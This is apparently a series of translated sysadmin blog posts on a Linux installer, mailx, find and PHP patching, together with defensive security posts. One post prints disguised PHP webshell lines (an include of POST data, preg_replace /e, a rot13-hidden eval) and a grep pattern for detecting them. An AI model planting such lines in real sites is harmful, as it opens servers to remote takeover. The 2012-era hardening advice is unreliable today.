

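Lempelf one-click installer updated to 1.0.3

What is the Lempelf one-click installer?

The Lempelf one-click installer is a program written in Shell for quickly installing commonly used services on Linux.

ChangeLog: mainly bug fixes in 1.0.3

2012-3-28 Released Lempelf 1.0.3
Bugfix: the domain address shown in the prompt after awstats is installed
Bugfix: nginx installation failure; corrected the file name on line 21 of ./scripts/setup_nginx.sh
Bugfix: php cannot find mysqlclient.so.18 at startup (echo "/opt/mysql/lib" > /etc/ld.so.conf.d/mysql.conf && ldconfig)
Bugfix: PAM errors in the secure log on 64-bit systems; corrected the path in /etc/pam.d/su
Bugfix: tty, ctrl+alt+del and ipv6 on CentOS 6
Bugfix: restrict which users may su; users who need su must be added to the group with gpasswd
Change: nginx logs are now kept for 1 month
Feature: added scripts/firstlog.sh, which records file and runtime information for later comparison

2012-3-23 Released Lempelf 1.0.2
php magic_quotes_gpc set to on
cmake added to the yum packages
mysql upgraded to Percona-Server-5.5.20-rel24.1
added the /tmp/mysql.sock symlink
php upgraded to 5.2.17 with the hash patch applied
nginx version number hidden, reported as 1.0
version number hidden in nginx.conf
changed the auto-started services in autosafe.sh
pcre upgraded to pcre-8.30
phpmyadmin updated to phpMyAdmin-3.4.10.1-all-languages

Updated again on 2012-3-28 16:00, 2012-3-30 14:30 and 2012-3-30 18:00.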

https://blog.c1gstudio.com/lempelfpage

Posted in Lempelf one-click package.



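Lempelf one-click package updated to 1.0.2

What is the Lempelf one-click installer?

The Lempelf one-click installer is a program written in Shell for quickly installing commonly used services on Linux.

ChangeLog: mainly performance and security improvements

2012-3-23 Released Lempelf 1.0.2
php magic_quotes_gpc set to on
cmake added to the yum packages
mysql upgraded to Percona-Server-5.5.20-rel24.1
added the /tmp/mysql.sock symlink
php upgraded to 5.2.17 with the hash patch applied
nginx version number hidden, reported as 1.0
version number hidden in nginx.conf
changed the auto-started services in autosafe.sh
pcre upgraded to pcre-8.30
phpmyadmin updated to phpMyAdmin-3.4.10.1-all-languages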

https://blog.c1gstudio.com/lempelfpage

Posted in Lempelf one-click package.



phpMyAdmin 3.3.X and 3.4.X contain an injection vulnerability

Versions tested and found affected: phpmyadmin 3.3.6, 3.3.10, 3.4.0, 3.4.5, 3.4.7

In addition, 3.0 also has a SQL injection vulnerability.

The latest stable version is currently phpMyAdmin 3.4.10.1; make sure to upgrade: http://www.phpmyadmin.net/home_page/downloads.php

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4107
http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection/

Posted in Security Advisories.



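PHP one-line trojans: detection and removal

Common trojans generally share the following characteristics.

1. They receive external variables
Common ones: $_GET, $_POST; stealthier ones: $_FILES, $_REQUEST…

2. They call an execution function
After obtaining the data, the trojan still has to execute it. Common ones: eval, assert, preg_replace. Disguised variants:

    include($_POST['a']);
    $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
    $hh("/[discuz]/e",$_POST['h'],"Access");
    @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

They also use encoding functions such as urldecode, gzinflate and base64_decode to disguise the code.

3. They write files
This is done to gain more privileges, e.g. copy, file_get_contents, exec.

The usual advice is to enable safe_mode or use disable_functions and the like to improve security; some programs may then fail to run properly. Basic security settings in php.ini:

    expose_php = OFF
    register_globals = Off
    display_errors = Off
    cgi.fix_pathinfo=0
    magic_quotes_gpc = On
    allow_url_fopen = Off
    allow_url_include = Off

Also configure open_basedir.

Finding trojan scripts
Searching for the hidden signatures and the entry points turns up most trojans.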

    #!/bin/bash
    # Log recently changed PHP files, ownerless files and lines matching webshell signatures.
    findpath=./
    logfile=findtrojan.log
    echo -e "$(date +%Y-%m-%d_%H:%M:%S) start\r" >> "$logfile"
    echo -e '============changetime list==========\r\n' >> "${logfile}"
    # PHP files whose status changed within the last 3 days
    find "${findpath}" -name "*.php" -ctime -3 -type f -exec ls -l {} \; >> "${logfile}"
    echo -e '============nouser file list==========\r\n' >> "${logfile}"
    # files whose owner and group no longer exist
    find "${findpath}" -nouser -nogroup -type f -exec ls -l {} \; >> "${logfile}"
    echo -e '============php one word trojan ==========\r\n' >> "${logfile}"
    find "${findpath}" -name "*.php" -exec egrep -I -i -C1 -H 'exec\(|eval\(|assert\(|system\(|passthru\(|shell_exec\(|escapeshellcmd\(|pcntl_exec\(|gzuncompress\(|gzinflate\(|unserialize\(|base64_decode\(|file_get_contents\(|urldecode\(|str_rot13\(|\$_GET|\$_POST|\$_REQUEST|\$_FILES|\$GLOBALS' {} \; >> "${logfile}"
    # use -l instead of -C1 -H to print only the file names
    echo -e "$(date +%Y-%m-%d_%H:%M:%S) end\r" >> "$logfile"
    more "$logfile"
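The grep above flags every file that touches $_GET or $_POST and cannot see a function name that has been split up or rot13-encoded. The following added example (not from the original post; written in Python, with `triage`, its scoring and the sample files constructed here) undoes the two disguises shown earlier and rates a file high only when an execution sink meets an input source or was hidden.

```python
import codecs
import re

SOURCE = re.compile(r"\$_(?:GET|POST|REQUEST|FILES)\b")
CALL_SINK = re.compile(r"\b(?:eval|assert|system|passthru|shell_exec|pcntl_exec|exec)\s*\(", re.I)
INCLUDE_VAR = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$", re.I)
E_MODIFIER = re.compile(r"""["']/[^"'\n]*/[a-zA-Z]*e[a-zA-Z]*["']""")
DECODER = re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|urldecode|str_rot13)\s*\(", re.I)
ROT13_LITERAL = re.compile(r"""str_rot13\(\s*(["'])([A-Za-z_]+)\1\s*\)""", re.I)
CONCAT = re.compile(r"""["']\s*\.\s*["']""")

def normalize(php):
    """Undo str_rot13() on a string literal, then rejoin "a"."b" concatenations."""
    php = ROT13_LITERAL.sub(lambda m: "'" + codecs.decode(m.group(2), "rot13") + "'", php)
    return CONCAT.sub("", php)

def sinks(text):
    """Names of execution sinks visible in the given text."""
    found = {m.group(0).rstrip("( \t").lower() for m in CALL_SINK.finditer(text)}
    if INCLUDE_VAR.search(text):
        found.add("include($var)")
    if "preg_replace" in text.lower() and E_MODIFIER.search(text):
        found.add("preg_replace/e")
    return found

def triage(php):
    clear = normalize(php)
    visible, all_sinks = sinks(php), sinks(clear)
    hidden = all_sinks - visible              # only visible after de-obfuscation
    has_source = bool(SOURCE.search(clear))
    if all_sinks and (has_source or hidden):
        verdict = "high"
    elif all_sinks or (has_source and DECODER.search(clear)):
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "sinks": sorted(all_sinks), "hidden": sorted(hidden)}

# Constructed samples: the three variants quoted in this post plus one benign page.
SAMPLES = {
    "include": "<?php include($_POST['a']); ?>",
    "concat": r'''<?php $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $hh("/[discuz]/e",$_POST['h'],"Access"); ?>''',
    "rot13": "<?php @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'); ?>",
    "benign": "<?php $name = htmlspecialchars($_GET['name']); echo 'Hello ' . $name; ?>",
}

if __name__ == "__main__":
    for name, php in SAMPLES.items():
        print(name, triage(php))
```

A legitimate call such as a database `exec(` still lands in "review", so the result is a work list for a person, not a verdict.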

Posted in Security, Technology.



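A regular expression mnemonic rhyme

Regex is rather snobbish too: it sharpens its head to pocket the money; (the start anchor ^ and the end anchor $)
Special symbols it cannot recognise, so a backslash leads the way; (special symbols such as . and *)
Backslash followed by lowercase w stands for digits and letters; (\w matches digits and letters; \d matches digits)
Backslash followed by lowercase d stands for digits only;
Backslash followed by lowercase a is the alert character, one beep;
Backslash followed by lowercase b is a word boundary or a backspace;
Backslash followed by lowercase t is plainly the tab character;
Backslash followed by lowercase r is the carriage return, as you know;
Backslash followed by lowercase s is the whitespace character, and it matters;
After the lowercase ones come the uppercase ones, and there are a great many;
Backslash followed by uppercase W: letters and digits step aside;
Backslash followed by uppercase S: whitespace steps aside too;
Backslash followed by uppercase D: digits step aside from here on;
Backslash followed by uppercase B: excludes the start and the end;

To repeat a single character, three symbols help out; (* + ?)
Star from 0 and plus from 1, up to infinity; the question mark covers only 0 and 1; (* means 0-n, + means 1-n, ? means 0-1 repetitions)
There is much to learn inside curly braces, which are powerful at repetition; ({n} {n,} {n,m})
To repeat a string, wrap it in parentheses; ((abc){3} means the string "abc" repeated 3 times)
To define a custom set, square brackets lend a hand;
Escape symbols do not work there, so line the characters up one by one;
If there are too many to line up, call in the hyphen; ([1-5])
Put a caret inside the square brackets for a powerful negated definition; ([^a] means any character except "a")
The vertical bar | is no small thing: the regexes on either side are alternatives; (on the keyboard it shares a key with "\")
The vertical bar can be used many times, which is handy for complex definitions;
Parentheses have many uses;
A backreference points at a group, and a number corresponds to it; (in "(\w+)\b\s+\1\b" the number "1" refers to the earlier "(\w+)")
Custom group names are supported: a question mark plus angle brackets; (in "(?<Word>\w+)", "\w+" is defined as a group named "Word")
Parentheses have many uses, and specifying a position relies entirely on them;
Question mark, equals sign, string: this locates what comes before the string; ("\w+(?=ing\b)" locates the string before "ing")
To locate what comes after the string, insert a less-than sign in the middle; ("(?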

Posted in Documentation and Theory.



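How to exclude files and directories in a find search

Find the files under the cache directory that are not html:

    find ./cache ! -name '*.html' -type f

List the directory names under the current directory, excluding the includes directory; the trailing -print is required:

    find . -maxdepth 1 -path './includes' -prune -o -type d -print

Update 2012-3-26: to exclude several directories, note that "(" must be preceded by "\". The pruned paths take no trailing slash, and -o must follow -prune, otherwise nothing is listed:

    find / \( -path /home -o -path /root \) -prune -o -nouser -type f -exec ls -l {} \;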

Posted in Linux Commands.



Sending mail on Linux with mailx through another SMTP server, without running Sendmail

A server farm may already have a dedicated mail server, and you may not want to run the sendmail service on every server. This method lets the other web servers and so on send through it, which makes management and maintenance easier.

1. First, an SMTP mail server is needed
Assume a mail server mail.c1gstudio.com already exists.

2. Append the following to /etc/mail.rc on the local machine

    set [email protected]
    set smtp=mail.c1gstudio.com
    set smtp-auth=login
    set smtp-auth-user=mailuser
    set smtp-auth-password=mailpassword

3. Send a mail

    mail -v -s "Hello " [email protected] < /etc/hosts

Several recipients can be given, separated by ","; -v shows the whole exchange:

    Resolving host mail.c1gstudio.com . . . done.
    Connecting to 208.133.200.99 . . . connected.
    220 Welcome to mail.c1gstudio.com ESMTP,Warning: Version not Available!
    >>> EHLO localhost
    250-mta.mail.c1gstudio.com
    250-PIPELINING
    250-SIZE 10240000
    250-VRFY
    250-ETRN
    250-AUTH LOGIN PLAIN
    250-AUTH=LOGIN PLAIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 DSN
    >>> AUTH LOGIN
    334 xcvxcv
    >>> xc3xvsd==
    334 f32fsdfwq
    >>> faddasdfaA==
    235 2.0.0 Authentication successful
    >>> MAIL FROM:
    250 2.1.0 Ok
    >>> RCPT TO:
    250 2.1.5 Ok
    >>> DATA
    354 End data with .
    >>> .
    250 2.0.0 Ok: queued as A2E541C41D
    >>> QUIT
    221 2.0.0 Bye
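AUTH LOGIN, as in the transcript above, sends the user name and password only base64-encoded, so a saved `mail -v` transcript holds both in recoverable form. The following added example (not part of the original post) decodes and redacts those replies before a transcript is stored or shared; the transcript is constructed from the placeholder credentials in the configuration above, and `scan` and the sender address are names chosen here.

```python
import base64


def _b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed transcript in the layout `mail -v` prints; credentials are the
# placeholder values mailuser / mailpassword, the sender address is made up.
TRANSCRIPT = "\n".join([
    ">>> EHLO localhost",
    "250-AUTH LOGIN PLAIN",
    "250 DSN",
    ">>> AUTH LOGIN",
    "334 " + _b64("Username:"),
    ">>> " + _b64("mailuser"),
    "334 " + _b64("Password:"),
    ">>> " + _b64("mailpassword"),
    "235 2.0.0 Authentication successful",
    ">>> MAIL FROM:<web01@example.org>",
    "250 2.1.0 Ok",
])


def scan(transcript):
    """Return (redacted transcript, [(server prompt, client value), ...])."""
    out, leaked, prompt = [], [], None
    for line in transcript.splitlines():
        if line.startswith("334 "):
            prompt = line[4:].strip()            # server challenge, base64
        elif prompt is not None and line.startswith(">>> "):
            try:
                pair = tuple(base64.b64decode(v, validate=True).decode()
                             for v in (prompt, line[4:].strip()))
            except (ValueError, UnicodeDecodeError):
                pair = ("?", "?")                # still an AUTH reply: redact it anyway
            leaked.append(pair)
            line, prompt = ">>> [AUTH reply redacted]", None
        else:
            prompt = None
        out.append(line)
    return "\n".join(out), leaked


if __name__ == "__main__":
    redacted, leaked = scan(TRANSCRIPT)
    print(redacted)
    print("recoverable from the original transcript:", leaked)
```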

Reference: http://kc1985.blog.51cto.com/2407758/537881

====================
Update 2012-4-10
The test above ran without problems on CentOS 6.0, but it does not succeed on CentOS 5.x. I searched for ages without finding anything.
One day I finally spotted the difference: CentOS 6 ships Heirloom Mailx, which is widely used on Debian, and yum search does not find it.

centos5.8

    mailx -V
    8.1 6/6/93. Type ? for help.
    "/var/spool/mail/root": 2 messages 2 new

centos6.0

    mailx -V
    12.4 7/29/08

Once the problem is found it is easy to deal with. The heirloom project site is http://sourceforge.net/projects/heirloom/ and the latest version is currently mailx-12.4.

1. Install mailx

    wget "http://sourceforge.net/settings/mirror_choices?projectname=heirloom&filename=heirloom-mailx/12.4/mailx-12.4.tar.bz2"
    tar jxvf mailx-12.4.tar.bz2
    cd mailx-12.4
    make
    make install

make install fails:

    test -d /usr/local/bin || mkdir -p /usr/local/bin
    /usr/ucb/install -c mailx /usr/local/bin/mailx
    make: /usr/ucb/install: Command not found
    make: *** [install] Error 127

Pass the path of install explicitly:

    make install UCBINSTALL=/usr/bin/install

By default it installs to /usr/local/bin/mailx and /etc/nail.rc. A custom install directory can also be chosen:

    make PREFIX=/opt/mailx SYSCONFDIR=/opt/mailx/etc

2. Append the following to /etc/nail.rc on the local machine
Note that the file is nail.rc, not mail.rc.

    set [email protected]
    set smtp=mail.c1gstudio.com
    set smtp-auth=login
    set smtp-auth-user=mailuser
    set smtp-auth-password=mailpassword

3. Switch to the new mailx

    mv /bin/mail /bin/mail.OFF
    ln -s /usr/local/bin/mailx /bin/mail

4. Test

    mail -v -s "new mailx " [email protected] < /etc/hosts

    Resolving host mail.c1gstudio.com . . . done.
    ….

==========================
Update 2013-4-26
If it fails because libiconv.so.2 cannot be found:

    mailx: error while loading shared libraries: libiconv.so.2: cannot open shar

Check whether libiconv is installed, then add its lib directory to /etc/ld.so.conf. It is usually /usr/local/lib/:

    echo '/usr/local/lib/' >> /etc/ld.so.conf
    ldconfig -v

Posted in Mail/Postfix.



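File size limit exceeded when backing up

When backing up files to a USB drive, mind the partition format: with the commonly used FAT32 a single file can be at most 4G, and going over that produces the File size limit exceeded error.

Posted in Backup.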



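Fckeditor <= 2.4.2 contains an upload vulnerability

Version <= 2.4.2 for PHP: the code that handles PHP uploads does not restrict the uploaded file type for the Media type, which lets users upload arbitrary files! Save the following as an html file and change the action address.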

Upload a new file:

There are many more vulnerabilities; see the reference for details.
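The failure mode described above, one resource type with no file-type control, modelled as an added example (Python, not FCKeditor's own code and not from the original post). The type names follow the post; the extension lists and both function names are constructed here, and the hardened check refuses anything it has no allowlist for.

```python
import os

# Constructed per-type allowlists: "Media" has no entry, modelling the gap above.
ALLOWED = {
    "File": {"pdf", "doc", "txt", "zip"},
    "Image": {"jpg", "jpeg", "png", "gif"},
    "Flash": {"swf"},
}
# Hardened table: every type the uploader offers has an explicit allowlist.
HARDENED = dict(ALLOWED, Media={"mp3", "avi", "mpg", "wmv"})


def allowed_fail_open(resource_type, filename, table=ALLOWED):
    """Flawed model: a type without a list is treated as 'no restriction'."""
    ext = filename.rsplit(".", 1)[-1].lower()
    allow = table.get(resource_type)
    return True if not allow else ext in allow


def allowed_fail_closed(resource_type, filename, table=HARDENED):
    """Hardened model: unknown type, missing list or unexpected name is refused."""
    allow = table.get(resource_type)
    if not allow:
        return False
    # Strip any client-supplied path and trailing dots or spaces.
    name = os.path.basename(filename.replace("\\", "/")).rstrip(". ")
    parts = name.lower().split(".")
    # Exactly one extension and a non-empty stem: refuses a.php.mp3 and .htaccess.
    if len(parts) != 2 or not parts[0]:
        return False
    return parts[1] in allow


if __name__ == "__main__":
    for rtype, fname in [("Media", "shell.php"), ("Media", "clip.mp3"),
                         ("Media", "shell.php.mp3"), ("Video", "clip.mp3")]:
        print(rtype, fname, allowed_fail_open(rtype, fname),
              allowed_fail_closed(rtype, fname))
```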

Reference: http://www.85815.com/article.asp?id=1320

Posted in Security Advisories.



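Applying the hash collision vulnerability patch to PHP 5.2.*

In PHP 5.2.*, a denial-of-service attack is possible by constructing hash collisions. In response to this vulnerability the PHP project released PHP 5.3.9, but it will not release a PHP 5.2.18 for it. 5.2.* installations can apply the patch below to solve the problem.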

https://github.com/laruence/laruence.github.com/tree/master/php-5.2-max-input-vars

Languages and versions currently known to be affected:

Java, all versions

JRuby <= 1.6.5

PHP <= 5.3.8, <= 5.4.0RC3

Python, all versions

Rubinius, all versions

Ruby <= 1.8.7-p356

Apache Geronimo, all versions

Apache Tomcat <= 5.5.34, <= 6.0.34, <= 7.0.22

Oracle Glassfish <= 3.1.1

Jetty, all versions

Plone, all versions

Rack, all versions

V8 JavaScript Engine, all versions

Languages that are not affected, or that have fixed versions:

PHP >= 5.3.9, >= 5.4.0RC4

JRuby >= 1.6.5.1

Ruby >= 1.8.7-p357, 1.9.x

Apache Tomcat >= 5.5.35, >= 6.0.35, >= 7.0.23

Oracle Glassfish, N/A (Oracle reports that the issue is fixed in the main codeline and scheduled for a future CPU)

Upgrade PHP from 5.2.14 to 5.2.17 and apply the patch.
Download the patch: https://github.com/laruence/laruence.github.com/zipball/master

Go to the directory where PHP was built before:

    cd src/lempelf/package/
    wget http://www.php.net/get/php-5.2.17.tar.gz/from/kr.php.net/mirror
    wget http://php-fpm.org/downloads/php-5.2.17-fpm-0.5.14.diff.gz
    tar zxvf php-5.2.17.tar.gz
    # apply the php-fpm patch
    gzip -cd php-5.2.17-fpm-0.5.14.diff.gz | patch -d php-5.2.17 -p1
    unzip laruence-laruence.github.com-43969a1.zip
    cd php-5.2.17
    # apply the hash collision patch
    # PATH_TO_PATCH is a placeholder: the max-input-vars patch file inside the unzipped archive
    patch -p1 < PATH_TO_PATCH
    patching file configure
    Hunk #1 succeeded at 2176 (offset 11 lines).
    patching file configure.in
    patching file main/main.c
    patching file main/php_globals.h
    patching file main/php_variables.c
    patching file main/php_version.h

With the patches applied, recompile PHP:

    ./configure --prefix=/opt/php-5.2.17p1 --with-config-file-path=/opt/php-5.2.17p1/etc \
        --with-mysql=/opt/mysql --with-mysqli=/opt/mysql/bin/mysql_config \
        --with-iconv-dir=/usr/local --with-freetype-dir --with-jpeg-dir --with-png-dir \
        --with-zlib --with-libxml-dir=/usr --disable-rpath --enable-discard-path \
        --enable-safe-mode --enable-bcmath --enable-shmop --enable-sysvsem \
        --enable-inline-optimization --with-curl --with-curlwrappers --enable-mbregex \
        --enable-fastcgi --enable-fpm --enable-force-cgi-redirect --enable-mbstring \
        --with-mcrypt --with-gd --enable-gd-native-ttf --with-openssl --with-mhash \
        --enable-pcntl --enable-sockets --with-xmlrpc --enable-zip --enable-soap \
        --enable-xml --enable-zend-multibyte --disable-debug --disable-ipv6
    make ZEND_EXTRA_LIBS='-liconv'
    make install

    # rebuild the extensions against the new PHP
    cd ../memcache-3.0.5
    make clean
    /opt/php-5.2.17p1/bin/phpize
    ./configure --with-php-config=/opt/php-5.2.17p1/bin/php-config
    make
    make install

    cd ../eaccelerator-0.9.6.1
    make clean
    /opt/php-5.2.17p1/bin/phpize
    ./configure --enable-eaccelerator=shared --with-php-config=/opt/php-5.2.17p1/bin/php-config
    make
    make install

    cd ../PDO_MYSQL-1.0.2
    make clean
    /opt/php-5.2.17p1/bin/phpize
    ./configure --with-php-config=/opt/php-5.2.17p1/bin/php-config --with-pdo-mysql=/opt/mysql
    make
    make install

    cd ../imagick-2.2.2/
    make clean
    /opt/php-5.2.17p1/bin/phpize
    ./configure --with-php-config=/opt/php-5.2.17p1/bin/php-config
    make
    make install

    # on 32-bit use this
    cp ../ZendOptimizer-3.3.9-linux-glibc23-i386/data/5_2_x_comp/ZendOptimizer.so /opt/php-5.2.17p1/lib/php/extensions/no-debug-non-zts-20060613/
    # on 64-bit use this
    cp ../ZendOptimizer-3.3.9-linux-glibc23-x86_64/data/5_2_x_comp/ZendOptimizer.so /opt/php-5.2.17p1/lib/php/extensions/no-debug-non-zts-20060613/

    mkdir -p /opt/php-5.2.17p1/eaccelerator_cache
    chown www:website /opt/php-5.2.17p1/eaccelerator_cache/
    chmod 770 /opt/php-5.2.17p1/eaccelerator_cache/
    touch /opt/php-5.2.17p1/logs/php_error.log
    chown www:website /opt/php-5.2.17p1/logs/php_error.log
    chmod 770 /opt/php-5.2.17p1/logs/php_error.log

    # upgrade pear (optional)
    /opt/php-5.2.17p1/bin/pear upgrade pear
    /opt/php-5.2.17p1/bin/pear install Benchmark Cache_Lite DB HTTP Mail Mail_Mime Net_SMTP Net_Socket Pager XML_Parser XML_RPC

    cp -p /opt/php/etc/php.ini /opt/php-5.2.17p1/etc/
    cp -p /opt/php/etc/php-fpm.conf /opt/php-5.2.17p1/etc/
    chown root:website /opt/php-5.2.17p1/etc/*
    chmod 660 /opt/php-5.2.17p1/etc/*

    /opt/php/sbin/php-fpm stop
    # remove the symlink and switch PHP
    rm /opt/php
    ln -s /opt/php-5.2.17p1/ /opt/php
    /opt/php/sbin/php-fpm start

Mind the paths in php-fpm.conf and php.ini.

If libmysqlclient.so.16 cannot be found:

    ./conftest: error while loading shared libraries: libmysqlclient.so.16

    echo /opt/mysql/lib/mysql >> /etc/ld.so.conf
    ldconfig -v

eAccelerator error:

[eAccelerator] This build of “eAccelerator” was compiled for PHP version 5.2.14. Rebuild it for your PHP version (5.2.17p1) or download precompiled binaries.

Recompile eAccelerator.

Reference: http://www.laruence.com/2011/12/29/2412.html

Posted in PHP, Security, Security Advisories.
